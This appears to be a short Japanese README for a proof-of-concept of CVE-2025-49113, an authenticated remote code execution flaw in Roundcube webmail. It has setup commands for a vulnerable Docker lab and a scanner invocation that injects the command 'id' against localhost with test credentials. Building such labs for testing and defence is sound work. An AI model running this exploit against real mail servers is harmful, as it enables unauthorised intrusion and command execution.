
認証後リモートコード実行の概念実証 - RoundcubeウェブメールのCVE-2025-49113に対するものです。脆弱なDocker環境とコマンドインジェクションのテスト用Pythonスキャナが含まれています。
cd Stand
docker-compose up -d
cd PoC/src
python3 scanner.py --target http://localhost:9000 --username test --password test --command "id"
test / testhttp://localhost:9000